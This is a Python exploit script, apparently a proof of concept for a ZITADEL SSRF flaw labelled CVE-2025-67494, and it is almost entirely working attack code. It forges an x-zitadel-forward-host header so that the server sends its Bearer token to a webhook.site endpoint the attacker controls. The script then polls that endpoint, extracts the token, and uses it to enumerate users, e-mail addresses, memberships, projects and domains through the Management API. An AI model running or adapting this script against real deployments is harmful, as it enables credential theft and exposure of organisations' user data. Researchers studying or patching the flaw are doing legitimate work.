README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval
"""
import requests
import json
import argparse
import time
from urllib.parse import urlparse
from pwn import log
# JSON body sent with every POST "_search" request in this file
# (offset "0", limit 10).
SEARCH_QUERY = {"query": {"offset": "0", "limit": 10}}
class WebhookManager:
    """Create a webhook.site endpoint and read back the requests it recorded."""

    def __init__(self):
        # Both attributes stay None until create() succeeds.
        self.token = None
        self.url = None

    def create(self):
        """Request a new webhook.site token.

        Returns:
            ``(token, url)`` on success (both are also stored on the
            instance), or ``(None, None)`` when the response status is not
            200/201 or the JSON body has no ``uuid``.
        """
        try:
            resp = requests.post("https://webhook.site/token", timeout=10)
            if resp.status_code not in (200, 201):
                return None, None
            uuid = resp.json().get('uuid')
            if not uuid:
                return None, None
            self.token = uuid
            self.url = f"https://webhook.site/{uuid}"
            return uuid, self.url
        except Exception as e:
            log.error(f"Error creating webhook: {e}")
        return None, None

    def get_requests(self, timeout=60):
        """Poll the webhook.site API until at least one request is recorded.

        Args:
            timeout: Overall polling budget in seconds.

        Returns:
            The ``data`` list from the first response that contains a
            non-empty one, or ``None`` when no token has been created or
            the budget runs out.
        """
        if not self.token:
            return None

        requests_url = f"https://webhook.site/token/{self.token}/requests"
        started = time.time()
        pause = 5
        seen_total = 0

        while time.time() - started < timeout:
            elapsed = time.time() - started
            try:
                resp = requests.get(requests_url, timeout=10)
                if resp.status_code == 200:
                    body = resp.json()
                    if isinstance(body, dict):
                        total = body.get('total', 0)
                    else:
                        total = 0
                    # Only announce the counter when it has grown.
                    if total > seen_total:
                        log.info(f"Webhook received {total} request(s)...")
                        seen_total = total
                    if body and 'data' in body and len(body['data']) > 0:
                        return body['data']
                remaining = int(timeout - elapsed)
                # Progress line when the remaining whole seconds are a
                # multiple of ten, skipped during the first five seconds.
                if remaining > 0 and remaining % 10 == 0 and elapsed > 5:
                    log.info(f"Waiting for SSRF request... ({remaining}s remaining)")
            except Exception as e:
                log.error(f"Error polling webhook: {e}")
            if elapsed < timeout:
                time.sleep(pause)
        return None

    def extract_bearer_token(self, requests_data):
        """Return the first Bearer token found in the recorded requests.

        Args:
            requests_data: Iterable of request dicts, each optionally
                carrying a ``headers`` mapping.

        Returns:
            The text after ``"Bearer "`` from the first matching
            ``Authorization`` header (header name compared
            case-insensitively), or ``None`` if there is no such header.
        """
        if not requests_data:
            return None

        prefix = 'Bearer '
        for entry in requests_data:
            headers = entry.get('headers', {})
            if not headers:
                continue
            for name, raw in headers.items():
                if name.lower() != 'authorization':
                    continue
                # A header value may be a list; use its first element.
                if isinstance(raw, list):
                    raw = raw[0] if raw else ""
                if isinstance(raw, str) and raw.startswith(prefix):
                    return raw[len(prefix):]
        return None
class SSRFExploiter:
    """Send the single login-UI request that carries the forward-host header."""

    def __init__(self, target_url):
        # Base URL of the login UI; "/ui/v2/login" is appended in exploit().
        self.target_url = target_url

    def exploit(self, oob_host):
        """GET ``<target_url>/ui/v2/login`` with ``x-zitadel-forward-host``.

        Args:
            oob_host: Host name placed in the ``x-zitadel-forward-host``
                header.

        Returns:
            ``True`` once the request has completed (any status code),
            ``False`` if sending it raised.
        """
        log.info(f"Exploiting SSRF to {self.target_url}")
        log.info(f"OOB host: {oob_host}")

        login_url = f"{self.target_url}/ui/v2/login"
        forward_headers = {"x-zitadel-forward-host": oob_host}
        try:
            resp = requests.get(login_url, headers=forward_headers, timeout=30)
            log.success(f"SSRF request sent (status: {resp.status_code})")
            return True
        except Exception as e:
            log.error(f"Error during SSRF exploitation: {e}")
            return False
def api_request(method="GET", endpoint="", error_msg=""):
    """Build a decorator that turns a stub method into a Management API call.

    The decorated function's own body is never executed; the wrapper issues
    the HTTP request itself, using ``self.base_url`` and ``self.token`` from
    the instance it is bound to. Extra positional and keyword arguments
    passed to the wrapper are accepted but ignored.

    Args:
        method: ``"GET"`` selects ``requests.get``; any other value selects
            ``requests.post``. Only ``"POST"`` sends ``SEARCH_QUERY`` as the
            JSON body.
        endpoint: Path appended to ``<base_url>/management/v1/``.
        error_msg: Prefix logged when the request raises; nothing is logged
            when it is empty.

    Returns:
        A decorator. The wrapped method returns the decoded JSON body on
        HTTP 200 and ``None`` otherwise.
    """
    # Local import so this block brings its own dependency into scope.
    import functools

    def decorator(func):
        # wraps() keeps the stub's __name__/__doc__ on the wrapper, so the
        # decorated methods stay identifiable in tracebacks and help().
        @functools.wraps(func)
        def wrapper(self, *args, **kwargs):
            url = f"{self.base_url}/management/v1/{endpoint}"
            headers = {"Authorization": f"Bearer {self.token}"}
            payload = SEARCH_QUERY if method == "POST" else None
            if payload:
                headers["Content-Type"] = "application/json"
            try:
                req_func = requests.get if method == "GET" else requests.post
                response = req_func(url, headers=headers, json=payload, timeout=10)
                if response.status_code == 200:
                    return response.json()
            except Exception as e:
                if error_msg:
                    log.error(f"{error_msg}: {e}")
            return None
        return wrapper
    return decorator
class ZitadelAPI:
    """Thin client for a handful of ``/management/v1`` endpoints.

    Most methods are empty stubs: the ``api_request`` decorator applied to
    them performs the HTTP call and supplies the return value.
    """

    def __init__(self, base_url, token):
        # base_url is prefixed to every endpoint; token is sent as a Bearer
        # credential in the Authorization header.
        self.base_url = base_url
        self.token = token

    @api_request(method="GET", endpoint="iam", error_msg="Error retrieving IAM info")
    def get_iam_info(self):
        """GET ``iam`` (request issued by the decorator)."""

    @api_request(method="GET", endpoint="orgs/me", error_msg="Error retrieving org info")
    def get_org_info(self):
        """GET ``orgs/me`` (request issued by the decorator)."""

    @api_request(method="POST", endpoint="users/_search", error_msg="Error listing users")
    def list_users(self):
        """POST ``users/_search`` (request issued by the decorator)."""

    @api_request(method="POST", endpoint="projects/_search", error_msg="Error listing projects")
    def list_projects(self):
        """POST ``projects/_search`` (request issued by the decorator)."""

    @api_request(method="POST", endpoint="orgs/me/members/_search", error_msg="Error listing members")
    def list_org_members(self):
        """POST ``orgs/me/members/_search`` (request issued by the decorator)."""

    @api_request(method="POST", endpoint="orgs/me/domains/_search", error_msg="Error listing domains")
    def list_org_domains(self):
        """POST ``orgs/me/domains/_search`` (request issued by the decorator)."""

    def get_user_memberships(self, user_id):
        """POST ``users/<user_id>/memberships/_search`` and return the result."""
        endpoint = f"users/{user_id}/memberships/_search"
        return self._request(endpoint, "POST", SEARCH_QUERY, "Error retrieving memberships")

    def _request(self, endpoint, method="GET", data=None, error_msg=""):
        """Issue one Management API request.

        Args:
            endpoint: Path appended to ``<base_url>/management/v1/``.
            method: ``"GET"`` uses ``requests.get``; anything else uses
                ``requests.post``.
            data: Optional JSON body; a truthy value also adds the
                ``Content-Type: application/json`` header.
            error_msg: Prefix logged when the request raises; nothing is
                logged when it is empty.

        Returns:
            The decoded JSON body on HTTP 200, otherwise ``None``.
        """
        target = f"{self.base_url}/management/v1/{endpoint}"
        request_headers = {"Authorization": f"Bearer {self.token}"}
        if data:
            request_headers["Content-Type"] = "application/json"

        try:
            if method == "GET":
                send = requests.get
            else:
                send = requests.post
            reply = send(target, headers=request_headers, json=data, timeout=10)
            if reply.status_code == 200:
                return reply.json()
        except Exception as e:
            if error_msg:
                log.error(f"{error_msg}: {e}")
        return None
class DataFormatter:
    """Static helpers that render API response dicts as printable text.

    Every ``format_*`` method returns a string, or ``None`` when the input
    is empty or lacks the expected key.
    """

    @staticmethod
    def _format_list(data, key='result', formatter=None):
        """Format each item of ``data[key]`` and join the results with newlines.

        Args:
            data: Response dict expected to hold a list under ``key``.
            key: Name of the list entry inside ``data``.
            formatter: Callable applied once to every item; items for which
                it returns a falsy value are dropped. Defaults to ``str``.

        Returns:
            The joined lines, or ``None`` when there is nothing to show.
        """
        if not data or key not in data or not data[key]:
            return None
        if formatter is None:
            # The previous default (None) was not callable and raised TypeError.
            formatter = str
        # Call the formatter exactly once per item, then drop empty results.
        rendered = (formatter(item) for item in data[key])
        lines = [line for line in rendered if line]
        return "\n".join(lines) if lines else None

    @staticmethod
    def format_iam_info(data):
        """Render ``globalOrgId``, ``iamProjectId`` and ``defaultOrgId``."""
        if not data:
            return None
        gid = data.get('globalOrgId', 'N/A')
        pid = data.get('iamProjectId', 'N/A')
        did = data.get('defaultOrgId', 'N/A')
        return f"Global Org ID: {gid}\nIAM Project ID: {pid}\nDefault Org ID: {did}"

    @staticmethod
    def format_org_info(data):
        """Render id, name, state and primary domain of ``data['org']``."""
        if not data or 'org' not in data:
            return None
        org = data['org']
        oid = org.get('id', 'N/A')
        name = org.get('name', 'N/A')
        state = org.get('state', 'N/A')
        domain = org.get('primaryDomain', 'N/A')
        return f"ID: {oid}\nName: {name}\nState: {state}\nPrimary Domain: {domain}"

    @staticmethod
    def format_users(data):
        """Render one line per user: type, user name, optional e-mail, state."""
        def fmt_user(user):
            # A user entry with a 'machine' key is labelled Machine, else Human.
            user_type = "Machine" if 'machine' in user else "Human"
            username = user.get('userName', 'N/A')
            state = user.get('state', 'N/A')
            if 'human' in user and 'email' in user['human']:
                email = user['human']['email'].get('email', 'N/A')
                return f"{user_type}: {username} ({email}) - {state}"
            return f"{user_type}: {username} - {state}"
        return DataFormatter._format_list(data, 'result', fmt_user)

    @staticmethod
    def format_projects(data):
        """Render one line per project: name, id and state."""
        def fmt_project(project):
            return f"{project.get('name', 'N/A')} (ID: {project.get('id', 'N/A')}) - {project.get('state', 'N/A')}"
        return DataFormatter._format_list(data, 'result', fmt_project)

    @staticmethod
    def format_members(data):
        """Render one line per member: e-mail and comma-separated roles."""
        def fmt_member(member):
            email = member.get('email', 'N/A')
            roles = ", ".join(member.get('roles', []))
            return f"{email} - Roles: {roles}"
        return DataFormatter._format_list(data, 'result', fmt_member)

    @staticmethod
    def format_domains(data):
        """Render one line per domain: name, verification and primary flags."""
        def fmt_domain(domain):
            domain_name = domain.get('domainName', 'N/A')
            verified = "Verified" if domain.get('isVerified') else "Not Verified"
            primary = "Primary" if domain.get('isPrimary') else ""
            # strip() removes the trailing space left when primary is empty.
            return f"{domain_name} - {verified} {primary}".strip()
        return DataFormatter._format_list(data, 'result', fmt_domain)

    @staticmethod
    def format_memberships(data):
        """Render one line per membership: scope, display name and roles."""
        def fmt_membership(membership):
            org_name = membership.get('displayName', 'N/A')
            roles = ", ".join(membership.get('roles', []))
            iam = "IAM" if membership.get('iam') else "Org"
            return f"{iam}: {org_name} - Roles: {roles}"
        return DataFormatter._format_list(data, 'result', fmt_membership)
def print_info(title, data, formatter=None):
    """Log a titled banner followed by ``data``.

    Args:
        title: Heading logged between two 60-character ``=`` rules.
        data: Payload to show; nothing at all is emitted when it is falsy.
        formatter: Optional callable turning ``data`` into text. When given,
            its result is logged only if truthy; when omitted, ``data`` is
            printed as indented JSON.
    """
    if not data:
        return

    rule = '=' * 60
    log.info(f"\n{rule}")
    log.info(f"{title}")
    log.info(f"{rule}")

    if not formatter:
        print(json.dumps(data, indent=2, ensure_ascii=False))
        return

    text = formatter(data)
    if text:
        log.info(text)
def main():
    """Command-line entry point: parse arguments and run the steps in order.

    Steps: create a webhook, send the login-UI request, poll the webhook for
    a Bearer token, then query the Management API and print the results.
    """
    parser = argparse.ArgumentParser(description="Exploit for CVE-2025-67494 - ZITADEL SSRF with automatic Bearer token retrieval")
    parser.add_argument('-u', '--ui-url', required=True, help='ZITADEL Login UI URL (e.g., http://localhost:29000)')
    parser.add_argument('-a', '--api-url', help='ZITADEL Management API URL (e.g., http://localhost:28080). If not provided, will be auto-detected from UI URL')
    parser.add_argument('--timeout', type=int, default=60, help='Timeout in seconds (default: 60)')
    args = parser.parse_args()

    ui_url = args.ui_url
    base_url = args.api_url
    if not base_url:
        # No API URL given: derive it from the UI URL. Port 29000 is mapped
        # to 28080 on the same host; any other URL is reused unchanged.
        parsed = urlparse(ui_url)
        if parsed.port == 29000:
            base_url = f"{parsed.scheme}://{parsed.hostname}:28080"
        else:
            base_url = f"{parsed.scheme}://{parsed.netloc}"

    log.info("Starting CVE-2025-67494 exploit")
    log.info(f"UI URL: {ui_url}, API URL: {base_url}")

    # NOTE(review): none of the log.error() calls below is followed by a
    # return; presumably this relies on pwntools' log.error raising. Confirm.
    webhook = WebhookManager()
    log.info("Creating webhook.site URL via API...")
    webhook_token, webhook_url = webhook.create()
    if not webhook_token:
        log.error("Failed to create webhook via API")

    oob_host = f"{webhook_token}.webhook.site"
    log.success(f"Webhook created: {webhook_url}")
    log.info(f"OOB host: {oob_host}")

    exploiter = SSRFExploiter(ui_url)
    log.info("Sending SSRF request...")
    exploiter.exploit(oob_host)

    log.info(f"Polling webhook for Bearer token (timeout: {args.timeout}s)...")
    requests_data = webhook.get_requests(args.timeout)
    if not requests_data:
        log.error(f"Timeout: No requests received within {args.timeout} seconds")

    token = webhook.extract_bearer_token(requests_data)
    if not token:
        log.error("Bearer token not found in webhook requests")
    log.success("Bearer token successfully retrieved!")
    log.info(f"Token: {token[:50]}...")

    log.info("Retrieving information via Management API...")
    api = ZitadelAPI(base_url, token)

    print_info("IAM Information", api.get_iam_info(), DataFormatter.format_iam_info)
    print_info("Organization Information", api.get_org_info(), DataFormatter.format_org_info)

    users = api.list_users()
    print_info("Users", users, DataFormatter.format_users)
    if users and 'result' in users and len(users['result']) > 0:
        # Memberships are looked up for the first listed user only.
        first_user_id = users['result'][0]['id']
        memberships = api.get_user_memberships(first_user_id)
        print_info(f"User Memberships (User ID: {first_user_id})", memberships, DataFormatter.format_memberships)

    # Remaining listings, fetched and printed in the order given here.
    remaining_sections = (
        ("Projects", api.list_projects, DataFormatter.format_projects),
        ("Organization Members", api.list_org_members, DataFormatter.format_members),
        ("Organization Domains", api.list_org_domains, DataFormatter.format_domains),
    )
    for section_title, fetch, render in remaining_sections:
        print_info(section_title, fetch(), render)

    log.success("Exploitation completed successfully!")
# Call main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()